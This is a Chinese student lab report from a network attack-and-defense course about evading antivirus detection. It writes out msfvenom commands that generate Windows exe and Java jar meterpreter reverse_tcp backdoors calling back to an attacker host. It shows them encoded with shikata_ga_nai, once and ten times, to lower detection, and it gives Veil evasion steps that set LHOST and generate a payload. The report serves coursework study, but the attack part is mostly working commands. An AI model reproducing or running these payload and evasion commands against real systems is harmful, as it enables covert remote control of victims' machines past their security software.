首页 > 其他分享 >《网络与系统攻防技术》实验三实验报告

《网络与系统攻防技术》实验三实验报告

时间:2024-10-21 17:10:20浏览次数:1  
标签:攻防 LHOST 2328 jar 实验 msfvenom 实验报告 veil 输入

1.实践内容

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

veil,加壳工具

使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验要求

掌握免杀原理与技术
回答问题

(1)杀软是如何检测出恶意代码的?

(2)免杀是做什么?

(3)免杀的基本方法有哪些?

3.实验过程

任务一:正确使用msf编码器,veil-evasion,利用shellcode编程等免杀工具或技巧

  1. 使用msfvenom生成jar等文件。

输入msfvenom --list formats

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-1.exe,生成payload

但没有编码的后门程序会被杀毒软件查出,尝试用msf编码器对后门程序进行编码

使用编码器对payload进行编码,输入

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-2.exe

发现一次编码后的后门程序还是很容易被查出,尝试对后门程序进行多次编码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.1.101 LPORT=2328 -f exe > 20222328-3.exe

发现多次编码后的后门程序依然会被查出,由此可知编码对后门程序的隐藏作用不大

选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -f jar > 20222328-1.jar

再对payload进行编码,输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=2328 -e x86/shikata_ga_nai -i 10 -f jar > 20222328-2.jar

发现指数小了很多,很有用

2.使用veil,加壳工具

首先下载veil,完成后输入veil

输入use evasion

使用c/meterpretermrev_tcp.py,即7号,所以输入use 7

查看虚拟机IP,然后输入set LHOST 192.168.1.105;set LPORT 2328;generate

然后输入输入cd /var/lib/veil/output/compiled/,进入文件夹并输入ls查看,再去进行检测

标签:攻防,LHOST,2328,jar,实验,msfvenom,实验报告,veil,输入
From: https://www.cnblogs.com/zyty/p/18488274

相关文章

  • 20222425 2024-2025-1《网络与系统攻防技术》 实验二实验报告
    目录1.实验内容2.实验问题3.实验过程3.1windows下使用netcat获取kali的Shell,用cron命令启动某项任务3.1.1使用netcat获取kali的shell3.1.2用cron命令启动某项任务3.2kali下使用socat获取windows的Shell,用schtasks命令创建并启动某项任务计划3.2.1实验准备3.2.2......
  • 【智能大数据分析 | 实验四】Spark实验:Spark Streaming
    【作者主页】FrancekChen【专栏介绍】⌈⌈⌈智能大数据分析⌋......
  • 20222323 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实践目标(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀(3)用另一电脑实测,在杀软开启的情况下,可......
  • 流量分类实验
    源代码:【免费】网络测量实验之流量分类实验源代码资源-CSDN文库实验背景决策树就像一棵树,从根节点开始,每个节点都是一个判断条件,每个分支代表一个选择。沿着树的路径,直到叶子节点,得到的类别就是最终的决策结果。以下是决策树算法的流程:1.选择判断条件:首先,我们需要选择一个......
  • 20222411 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实践内容(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要......
  • # 20222309 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容1、实验目标(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程(2)使用socat获取主机操作Shell,任务计划启动(3)使用MSFmeterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat......
  • 1-2实验截图
                 ......
  • 【华三】VXLAN典型组网-集中式网关EVPN实验
    【华三】VXLAN典型组网-集中式网关EVPN实验EVPN在VXLAN的应用EVPN的常用路由类型VXLAN的相关术语VXLAN隧道工作模式L2Gateway:二层转发模式IPGateway:三层转发模式VXLAN集中式网关实验需求拓扑R1R2R3R4SW1SW2PC测试检查报文分析(抓R2的G0/0接口即可)查看L2VPN的Tunnel......
  • 实验报告3-数据库框架实现数据操作1
    资源下载  实验报告3-数据库框架实现数据操作1一、实现思路        使用SpringBoot整合MyBatis-Plus完成开支分析案例的后台数据整合功能。要求:        1、根据静态页面的echarts数据,设计返回前端数据包装类CategoryVo。        2、多表关......
  • 20222423 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实践内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用msfvenom生成jar、apk等其他文件使用veil加壳工具使用C+shellcode进行编程通过组合应用各种技术实现恶意代码免杀用另一电脑实测,在杀软开启的情况下,可运行并回连......